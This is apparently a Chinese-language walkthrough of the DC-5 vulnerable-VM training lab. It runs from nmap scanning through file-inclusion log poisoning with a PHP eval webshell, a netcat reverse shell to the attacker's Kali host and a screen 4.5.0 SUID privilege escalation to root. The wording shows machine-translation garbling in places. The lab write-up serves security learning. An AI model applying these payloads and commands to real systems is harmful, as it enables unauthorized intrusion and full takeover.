1.取得靶机,将靶机复制在自己电脑上,打开靶机

选择编辑此虚拟机,点击网络配适器,选择NAT模式然后确定

开启此虚拟机

phpevalpostDC5靶场提权教程 SQL

到这步后我们开启kali虚拟机,同样选择编辑此虚拟机,点击网络配适器,选择NAT模式然后确定

打开kali虚拟机,其密码为kali

我们先获取root权限,输入su root,password为123456(Linux内输入password是看不见的)

先用ifconfig查看kali的ip地址为192.168.126.129

我们用nmap扫描网络信息,输入nmap -sP 192.168.126.0/24 -oN nmap.sV

得到靶机ip:192.168.126.132,对其进行端口扫描

可以看到开放了80端口和111端口,111端口是RPC做事,觉得没有什么可以利用的点,我们去浏览器访问80端口试试(可以打开kali自带的火狐浏览器,利用kali自带浏览器前须要打开burpsuit,也可以用自己电脑的浏览器)

输入刚刚得到的靶机ip,例如我的便是http://192.168.126.132

创造这是一个动态页面,可以考试测验去提交一些东西。

我们点击右上角Contact,往下滑创造可以输入

提交后可以创造,本人电脑的Microsoft Edge由于改成了翻译系统,一样平常情形会显示DC-5 is alive

扫描web目录,输入dirb http://192.168.126.132

很可惜此处没有太多有代价的东西,连续浏览可以创造contact可以创造年份会随着页面刷新而刷新

之前在thinkyou.php中看到了这种情形(网页刷新一次,年份都会发生变革),因此我们预测thinkyou.php调用了footer.php,于是想到了文件包含漏洞,输入footer.php试试

瞥见页面变革,我们回到kali,用kali自带的burpsuite进行抓包

关于burpsuite的详细配置教程我放在其余一个文档里面,没有配置的小伙伴可以先配置一下

打开burpsuite后,返回浏览器界面

在开着intercept on的同时刷新浏览器页面(回到浏览器按下f5)burp会自动抓包

点击Action,选择send to Repeater发送到Repeater

利用access.log。
抓包在burpsuite-repeater中,把url修正为一句话木马 Get <?php phpinfo();?> ,回显400 bad request

返回浏览器查看,哭瞥见页面发生变革

滑到最底下是这样的,可以瞥见显示了php信息,意识到可以通过这个办法写入木马

我们返回burpsuite,写入一句话木马 GET <?php @eval($_POST['1234'];?> .

(把稳,这里的POST['']里面的内容是可以变动的,也便是之后用蚁剑连接的密码

接着我们利用蚁剑连接,此处我的蚁剑是windows版本的,以是密码便是POST内的内容1234

点击添加数据

点击测试连接,可以瞥见连接成功

我们回到kali,输入nc -lvvp 1234开启这个端口的监听

然后在蚁剑中,点击右键,选择虚拟终端,输入nc -e /bin/bash 192.168.126.129 1234进行shell反弹

可以在kali中瞥见成功

返回kali交互式 输入python -c 'import pty;pty.spawn("/bin/bash")'

利用find / -perm -4000 2>/dev/null查找具有SUID权限的文件,创造screen-4.5.0。

利用searchsploit查找该命令漏洞:searchsploit screen 4.5.0 -w

两个文件是相同的,41152.txt是见告你怎么做,之前的靶机也涌现过,显然41154.sh已经把文件给了,以是选择下载41154.sh

创造有两个漏洞

先查看第一个

将第一个复制到桌面

cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh

查看该文件

创造其在 /tmp 路径下编译了两个 c,并实行了多少命令

按照脚本提示,先将第一部分内容写到libhax.c中(一共有三个部分)

第一步在桌面创建一个文件夹存放三个部分的脚本

利用命令vim创建第一个libhax.c

然后编译这个脚本

gcc -fPIC -shared -ldl -o libhax.so libhax.c

利用vim命令创建第二个rootshell.c,复制粘贴完内容后按下esc输入:wq保存退出

再编译

gcc -o rootshell rootshell.c

末了一个部分dc5.sh同理,但是须要把稳的是下面须要转换一下格式

实行完命令后,可以瞥见在桌面home/dc-5文件夹有五个文件

将带有.c的文件删除,在kali中利用rm命令

再回到文件夹内可以瞥见

然后我们回到中国蚁剑,将文件上传到tmp文件里面,须要把稳的是我们一定要讲文件传到根目录下,而不是var,/var是源码

然后重命名,将路径去掉

回到kali反弹的shell(步骤和之前一样),进入到天麻片、目录里面

然后为dc5.sh添加可以实行权限,输入chmod +x dc5.sh

验证权限,切换到/root根目录下找到flag,渗透成功